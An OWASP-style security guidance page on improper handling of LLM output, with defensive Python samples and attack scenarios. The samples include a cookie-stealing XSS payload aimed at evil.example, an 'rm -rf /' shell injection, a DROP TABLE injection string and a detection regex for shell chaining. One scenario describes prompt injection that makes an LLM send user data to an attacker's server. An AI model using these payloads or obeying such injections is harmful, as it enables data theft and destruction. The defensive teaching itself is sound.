LLM05: Improper Output Handling
>Control Description
Improper Output Handling refers to insufficient validation, sanitization, and handling of LLM-generated outputs before they are passed downstream to other components and systems. Because LLM output can be influenced by prompt input, this behavior is similar to giving users indirect access to backend functionality.
>Vulnerability Types
1. Remote Code Execution: LLM output passed directly to a system shell or eval() function (a minimal sketch follows this list)
2. Cross-Site Scripting (XSS): LLM-generated JavaScript or Markdown rendered and interpreted by the browser
3. SQL Injection: LLM-generated queries executed without proper parameterization
4. Path Traversal: LLM output used to construct file paths without sanitization
5. Email Injection: LLM-generated content placed in email templates, enabling phishing attacks
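To make the first vulnerability type concrete, here is a minimal Python sketch contrasting model output that reaches a shell verbatim with an allowlist-validated alternative. The `run_llm_command_*` helpers and the allowlist contents are illustrative assumptions, not part of the source:

```python
import shlex
import subprocess

# Illustrative allowlist; a real deployment would derive this from
# the actions the application genuinely needs.
ALLOWED_COMMANDS = {"date", "uptime", "whoami"}

def run_llm_command_unsafe(llm_output: str) -> None:
    # VULNERABLE: the model's text reaches the shell verbatim, so a
    # response like "date; rm -rf /" becomes remote code execution.
    subprocess.run(llm_output, shell=True)

def run_llm_command_safe(llm_output: str) -> None:
    # Tokenize and validate against the allowlist before anything
    # touches the operating system.
    tokens = shlex.split(llm_output)
    if not tokens or tokens[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"Command not permitted: {llm_output!r}")
    # shell=False (the default) prevents metacharacter interpretation.
    subprocess.run(tokens, check=True)
```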
>Common Impacts
Successful exploitation can result in XSS and CSRF in web browsers, as well as SSRF, privilege escalation, or remote code execution on backend systems.
>Prevention & Mitigation Strategies
1. Treat the model as any other user: adopt a zero-trust approach and apply proper input validation to responses coming from the model before they reach backend functions
2. Follow OWASP ASVS (Application Security Verification Standard) guidelines for effective input validation and sanitization
3. Encode model output before returning it to users to mitigate undesired code execution by JavaScript or Markdown (see the encoding sketch after this list)
4. Implement context-aware output encoding based on where the LLM output will be used, e.g., HTML encoding for web content, SQL escaping for database queries
5. Use parameterized queries or prepared statements for all database operations (see the parameterized-query sketch below)
6. Employ strict Content Security Policies (CSP) to mitigate the risk of XSS from LLM-generated content (see the CSP example below)
7. Implement robust logging and monitoring to detect unusual patterns in LLM outputs (a minimal monitoring sketch follows below)
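A minimal sketch of strategy 3 using only the Python standard library; `render_chat_reply` and the payload string are illustrative assumptions:

```python
import html

def render_chat_reply(llm_output: str) -> str:
    # HTML-encode the model's text so any <script> tags or event
    # handlers it emits display as text instead of executing.
    # quote=True also escapes " and ' for safe use inside attributes.
    return html.escape(llm_output, quote=True)

# A hostile completion is neutralized before it reaches the page:
payload = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
print(render_chat_reply(payload))
# &lt;script&gt;fetch(&quot;https://evil.example/?c=&quot; + document.cookie)&lt;/script&gt;
```

HTML-escaping fits HTML bodies; output destined for URLs, attributes, or JavaScript contexts needs the matching context-aware encoder (strategy 4).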
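For strategy 5, a sketch of running an LLM-derived value through a parameterized query, using sqlite3 from the standard library; the schema and data are made up for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER, customer TEXT)")
conn.execute("INSERT INTO orders VALUES (1, 'alice')")

def find_orders(customer_name: str) -> list:
    # The LLM-derived value is bound as a parameter, never interpolated
    # into the SQL string, so "alice'; DROP TABLE orders;--" is treated
    # as a literal customer name rather than as SQL.
    cur = conn.execute("SELECT id FROM orders WHERE customer = ?", (customer_name,))
    return cur.fetchall()

print(find_orders("alice"))                         # [(1,)]
print(find_orders("alice'; DROP TABLE orders;--"))  # [] (injection is inert)
```

Note that parameterization protects values, not query structure; if the model is allowed to author whole queries, pair this with a least-privilege database account.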
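For strategy 6, a sketch of attaching a strict CSP header to every response. Flask is an assumption here, chosen only to keep the example short:

```python
from flask import Flask, Response

app = Flask(__name__)

@app.after_request
def set_csp(resp: Response) -> Response:
    # Forbid inline scripts and third-party sources, so even an
    # unescaped LLM payload that reaches the page will not execute.
    resp.headers["Content-Security-Policy"] = (
        "default-src 'self'; script-src 'self'; object-src 'none'"
    )
    return resp

@app.route("/")
def index() -> str:
    return "Chat frontend would be rendered here."
```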
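And for strategy 7, a minimal monitoring sketch: a regex-based screen that logs every model output and flags ones containing patterns commonly seen in injection payloads. The patterns are illustrative assumptions and would need tuning for a real application:

```python
import logging
import re

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("llm.output")

# Illustrative patterns; tune these for the application's threat model.
SUSPICIOUS = [
    re.compile(r"<\s*script", re.IGNORECASE),                  # inline script tags
    re.compile(r"\b(DROP|DELETE|TRUNCATE)\b", re.IGNORECASE),  # destructive SQL
    re.compile(r"[;&|]\s*(rm|curl|wget)\b"),                   # shell chaining
]

def screen_output(llm_output: str) -> bool:
    """Log every model output; return False when it looks like a payload."""
    hits = [p.pattern for p in SUSPICIOUS if p.search(llm_output)]
    if hits:
        log.warning("Suspicious LLM output blocked: patterns=%s", hits)
        return False
    log.info("LLM output passed screening (%d chars)", len(llm_output))
    return True
```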
>Attack Scenarios
An application uses an LLM extension to generate chatbot responses. The extension also offers administrative functions. The LLM passes its response directly to the extension without proper output validation, causing the extension to shut down for maintenance.
A user runs an LLM-powered website summarizer on a page that contains a prompt injection instructing the LLM to capture sensitive content from the site or the user's conversation and send it to an attacker-controlled server.
An LLM lets users craft SQL queries for a backend database through a chat-like feature. A user requests a query that deletes all database tables; because the generated query is executed without scrutiny, the tables are deleted.
A web app uses an LLM to generate content from user prompts without output sanitization. An attacker submits a crafted prompt causing the LLM to return an unsanitized JavaScript payload, resulting in XSS in the victim's browser.